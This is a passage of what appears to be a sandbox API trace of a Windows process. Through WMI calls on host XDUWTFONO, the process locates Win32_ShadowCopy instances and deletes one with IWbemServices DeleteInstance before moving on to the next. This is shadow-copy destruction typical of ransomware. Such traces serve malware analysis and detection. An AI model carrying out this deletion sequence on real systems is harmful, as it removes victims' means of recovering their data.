pperrinfo=0x1c64cc08*=0x0) returned 0x1 [0109.557] CoGetClassObject (in: rclsid=0x1b792338*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c870 | out: ppv=0x1c64c870*=0x1c8f1d40) returned 0x0 [0109.557] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f1d40, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c580 | out: ppvObject=0x1c64c580*=0x0) returned 0x80004002 [0109.557] WbemStatusCodeText:IClassFactory:CreateInstance (in: This=0x1c8f1d40, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c568 | out: ppvObject=0x1c64c568*=0x1c8f1d60) returned 0x0 [0109.557] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f1d60, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c470 | out: ppvObject=0x1c64c470*=0x1c8f1d60) returned 0x0 [0109.557] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f1d60, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64c4f0 | out: ppvObject=0x1c64c4f0*=0x0) returned 0x80004002 [0109.557] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f1d60) returned 0x3 [0109.558] CoGetContextToken (in: pToken=0x1c64c140 | out: pToken=0x1c64c140) returned 0x0 [0109.558] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f1d60, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c100 | out: ppvObject=0x1c64c100*=0x0) returned 0x80004002 [0109.558] CoGetContextToken (in: pToken=0x1c64c110 | out: pToken=0x1c64c110) returned 0x0 [0109.558] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f1d60) returned 0x4 [0109.558] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f1d60, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c228 | out: ppvObject=0x1c64c228*=0x0) returned 0x80004002 [0109.558] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x3 [0109.558] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x2 [0109.558] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d40) returned 0x0 [0109.558] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x1 [0109.558] CoGetContextToken (in: pToken=0x1c64c730 | out: pToken=0x1c64c730) returned 0x0 [0109.558] CoGetContextToken (in: pToken=0x1c64c670 | out: pToken=0x1c64c670) returned 0x0 [0109.558] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f1d60) returned 0x2 [0109.558] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f1d60, riid=0x1c64c7b0*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x1c64c790 | out: ppvObject=0x1c64c790*=0x1c8f1d60) returned 0x0 [0109.558] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x2 [0109.558] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x1 [0109.558] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0109.558] CoGetContextToken (in: pToken=0x1c64c7f0 | out: pToken=0x1c64c7f0) returned 0x0 [0109.559] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f1d60) returned 0x2 [0109.559] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f1d60, riid=0x1c64c930*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x1c64c910 | out: ppvObject=0x1c64c910*=0x1c8f1d60) returned 0x0 [0109.559] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x2 [0109.559] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f1d60) returned 0x3 [0109.559] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1c8f1d60, hRes=0xffffffff80041002, LocaleId=0x0, lFlags=1, MessageText=0x1c64cbe8 | out: MessageText=0x1c64cbe8*="Not found ") returned 0x0 [0109.559] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x2 [0109.559] SysStringLen (param_1="Not found ") returned 0xa [0109.566] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f90f0, puCount=0x1c64cd00 | out: puCount=0x1c64cd00*=0x2) returned 0x0 [0109.566] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f90f0, lFlags=4, puBuffLength=0x1c64cd00*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cd00*=0x28, pszText=0x0) returned 0x0 [0109.567] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f90f0, lFlags=4, puBuffLength=0x1c64cd00*=0x28, pszText="000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cd00*=0x28, pszText="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ShadowCopy") returned 0x0 [0109.567] IWbemClassObject:GetMethod (in: This=0x1c8f5460, wszName="Revert", lFlags=0, ppInSignature=0x1c64cbc8, ppOutSignature=0x1c64cbc0 | out: ppInSignature=0x1c64cbc8*=0x1c8fedc0, ppOutSignature=0x1c64cbc0*=0x1c8ff2c0) returned 0x0 [0109.568] IWbemClassObject:GetNames (in: This=0x1c8fedc0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x1c64cb38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c64cb30 | out: pNames=0x1c64cb30*="\x01ƀ\x08") returned 0x0 [0109.568] SafeArrayGetDim (psa=0x1b792680) returned 0x1 [0109.568] IWbemClassObject:Get (in: This=0x1c8fedc0, wszName="ForceDismount", lFlags=0, pVal=0x1c64cb30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cb2c*=0, plFlavor=0x1c64cb28*=0 | out: pVal=0x1c64cb30*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64cb2c*=11, plFlavor=0x1c64cb28*=0) returned 0x0 [0109.568] IWbemClassObject:Get (in: This=0x1c8fedc0, wszName="ForceDismount", lFlags=0, pVal=0x1c64cae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cadc*=11, plFlavor=0x1c64cad8*=0 | out: pVal=0x1c64cae0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64cadc*=11, plFlavor=0x1c64cad8*=0) returned 0x0 [0109.568] IWbemClassObject:Get (in: This=0x1c8fedc0, wszName="ForceDismount", lFlags=0, pVal=0x1c64cae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cadc*=11, plFlavor=0x1c64cad8*=0 | out: pVal=0x1c64cae0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64cadc*=11, plFlavor=0x1c64cad8*=0) returned 0x0 [0109.569] IWbemClassObject:Get (in: This=0x1c8fedc0, wszName="ForceDismount", lFlags=0, pVal=0x1c64cae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cadc*=11, plFlavor=0x1c64cad8*=0 | out: pVal=0x1c64cae0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64cadc*=11, plFlavor=0x1c64cad8*=0) returned 0x0 [0109.570] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1c8fedc0, wszProperty="ForceDismount", ppQualSet=0x1c64cb70 | out: ppQualSet=0x1c64cb70*=0x1c8ff630) returned 0x0 [0109.570] IWbemQualifierSet:Get (in: This=0x1c8ff630, wszName="ID", lFlags=0, pVal=0x1c64cb30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cb28*=0 | out: pVal=0x1c64cb30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cb28*=17) returned 0x0 [0109.570] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1c8fedc0, wszProperty="ForceDismount", ppQualSet=0x1c64cba0 | out: ppQualSet=0x1c64cba0*=0x1c8ff6b0) returned 0x0 [0109.571] IWbemQualifierSet:Get (in: This=0x1c8ff6b0, wszName="ID", lFlags=0, pVal=0x1c64cb60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cb58*=17 | out: pVal=0x1c64cb60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cb58*=17) returned 0x0 [0109.572] IWbemClassObject:GetMethod (in: This=0x1c8f5460, wszName="Revert", lFlags=0, ppInSignature=0x1c64cb68, ppOutSignature=0x1c64cb60 | out: ppInSignature=0x1c64cb68*=0x1c8ff950, ppOutSignature=0x1c64cb60*=0x1c8ffe50) returned 0x0 [0109.573] IWbemClassObject:GetNames (in: This=0x1c8ff950, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x1c64cad8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c64cad0 | out: pNames=0x1c64cad0*="\x01ƀ\x08") returned 0x0 [0109.573] SafeArrayGetDim (psa=0x1b792600) returned 0x1 [0109.573] IWbemClassObject:Get (in: This=0x1c8ff950, wszName="ForceDismount", lFlags=0, pVal=0x1c64cad0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cacc*=0, plFlavor=0x1c64cac8*=0 | out: pVal=0x1c64cad0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64cacc*=11, plFlavor=0x1c64cac8*=0) returned 0x0 [0109.573] IWbemClassObject:Get (in: This=0x1c8ff950, wszName="ForceDismount", lFlags=0, pVal=0x1c64ca80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64ca7c*=11, plFlavor=0x1c64ca78*=0 | out: pVal=0x1c64ca80*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64ca7c*=11, plFlavor=0x1c64ca78*=0) returned 0x0 [0109.573] IWbemClassObject:Get (in: This=0x1c8ff950, wszName="ForceDismount", lFlags=0, pVal=0x1c64ca80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64ca7c*=11, plFlavor=0x1c64ca78*=0 | out: pVal=0x1c64ca80*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64ca7c*=11, plFlavor=0x1c64ca78*=0) returned 0x0 [0109.573] IWbemClassObject:Get (in: This=0x1c8ff950, wszName="ForceDismount", lFlags=0, pVal=0x1c64ca80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64ca7c*=11, plFlavor=0x1c64ca78*=0 | out: pVal=0x1c64ca80*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64ca7c*=11, plFlavor=0x1c64ca78*=0) returned 0x0 [0109.574] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1c8ff950, wszProperty="ForceDismount", ppQualSet=0x1c64cb10 | out: ppQualSet=0x1c64cb10*=0x1c9001c0) returned 0x0 [0109.574] IWbemQualifierSet:Get (in: This=0x1c9001c0, wszName="ID", lFlags=0, pVal=0x1c64cad0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cac8*=0 | out: pVal=0x1c64cad0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cac8*=17) returned 0x0 [0109.574] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1c8ff950, wszProperty="ForceDismount", ppQualSet=0x1c64cb40 | out: ppQualSet=0x1c64cb40*=0x1c900240) returned 0x0 [0109.574] IWbemQualifierSet:Get (in: This=0x1c900240, wszName="ID", lFlags=0, pVal=0x1c64cb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64caf8*=17 | out: pVal=0x1c64cb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64caf8*=17) returned 0x0 [0109.575] IWbemClassObject:GetMethod (in: This=0x1c8f5460, wszName="Revert", lFlags=0, ppInSignature=0x1c64cb68, ppOutSignature=0x1c64cb60 | out: ppInSignature=0x1c64cb68*=0x1c9004e0, ppOutSignature=0x1c64cb60*=0x1c9009e0) returned 0x0 [0109.576] IWbemClassObject:Get (in: This=0x1c9004e0, wszName="ForceDismount", lFlags=0, pVal=0x1c64cb50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cb4c*=0, plFlavor=0x1c64cb48*=0 | out: pVal=0x1c64cb50*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64cb4c*=11, plFlavor=0x1c64cb48*=0) returned 0x0 [0109.576] IWbemClassObject:Get (in: This=0x1c9004e0, wszName="ForceDismount", lFlags=0, pVal=0x1c64cb60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cb5c*=11, plFlavor=0x1c64cb58*=0 | out: pVal=0x1c64cb60*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c64cb5c*=11, plFlavor=0x1c64cb58*=0) returned 0x0 [0109.682] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f6a00, puCount=0x1c64ce10 | out: puCount=0x1c64ce10*=0x2) returned 0x0 [0109.682] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f6a00, lFlags=4, puBuffLength=0x1c64ce10*=0x0, pszText=0x0 | out: puBuffLength=0x1c64ce10*=0x54, pszText=0x0) returned 0x0 [0109.682] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f6a00, lFlags=4, puBuffLength=0x1c64ce10*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64ce10*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x0 [0109.682] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cd60 | out: puCount=0x1c64cd60*=0x2) returned 0x0 [0109.682] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cd60*=0x17, pszText=0x0) returned 0x0 [0109.682] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.683] CoGetContextToken (in: pToken=0x1c64cbf0 | out: pToken=0x1c64cbf0) returned 0x0 [0109.683] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0109.683] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7c0 | out: ppvObject=0x1c64c7c0*=0x1b797ce0) returned 0x0 [0109.683] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0109.683] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0109.683] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__GENUS", lFlags=0, pVal=0x1c64cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cd4c*=0, plFlavor=0x1c64cd48*=0 | out: pVal=0x1c64cd50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cd4c*=3, plFlavor=0x1c64cd48*=64) returned 0x0 [0109.684] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f6a00, lFlags=2, puBuffLength=0x1c64ce20*=0x0, pszText=0x0 | out: puBuffLength=0x1c64ce20*=0x3d, pszText=0x0) returned 0x0 [0109.684] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f6a00, lFlags=2, puBuffLength=0x1c64ce20*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64ce20*=0x3d, pszText="Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x0 [0109.684] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0111.756] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0111.756] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c900d50, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0111.757] IUnknown:QueryInterface (in: This=0x1c900d50, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c900d50) returned 0x0 [0111.758] IUnknown:QueryInterface (in: This=0x1c900d50, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0111.758] IUnknown:QueryInterface (in: This=0x1c900d50, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0111.758] IUnknown:AddRef (This=0x1c900d50) returned 0x3 [0111.758] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0111.758] IUnknown:QueryInterface (in: This=0x1c900d50, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c900d58) returned 0x0 [0111.759] IMarshal:GetUnmarshalClass (in: This=0x1c900d58, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0111.759] IUnknown:Release (This=0x1c900d58) returned 0x3 [0111.759] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0111.759] IUnknown:AddRef (This=0x1c900d50) returned 0x4 [0111.759] IUnknown:QueryInterface (in: This=0x1c900d50, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0111.759] IUnknown:Release (This=0x1c900d50) returned 0x3 [0111.759] IUnknown:Release (This=0x1c900d50) returned 0x2 [0111.759] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0111.759] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0111.759] IUnknown:AddRef (This=0x1c900d50) returned 0x3 [0111.759] IUnknown:QueryInterface (in: This=0x1c900d50, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c900d50) returned 0x0 [0111.760] IUnknown:Release (This=0x1c900d50) returned 0x3 [0111.760] IUnknown:Release (This=0x1c900d50) returned 0x2 [0111.760] IUnknown:Release (This=0x1c900d50) returned 0x1 [0111.760] CoTaskMemFree (pv=0x1b77f8d0) [0111.760] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0111.760] IUnknown:AddRef (This=0x1c900d50) returned 0x2 [0111.760] IWbemClassObject:Get (in: This=0x1c900d50, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0111.760] IWbemClassObject:Get (in: This=0x1c900d50, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0111.760] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"") returned 0x53 [0111.761] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0111.761] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0111.761] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0111.761] IUnknown:Release (This=0x212498) returned 0x1 [0111.761] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c8f1d40) returned 0x0 [0111.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1d40, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0111.762] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1d40, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c9012e0) returned 0x0 [0111.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9012e0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c9012e0) returned 0x0 [0111.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9012e0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0111.763] WbemDefPath:IUnknown:AddRef (This=0x1c9012e0) returned 0x3 [0111.763] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0111.763] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9012e0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b786050) returned 0x0 [0111.763] 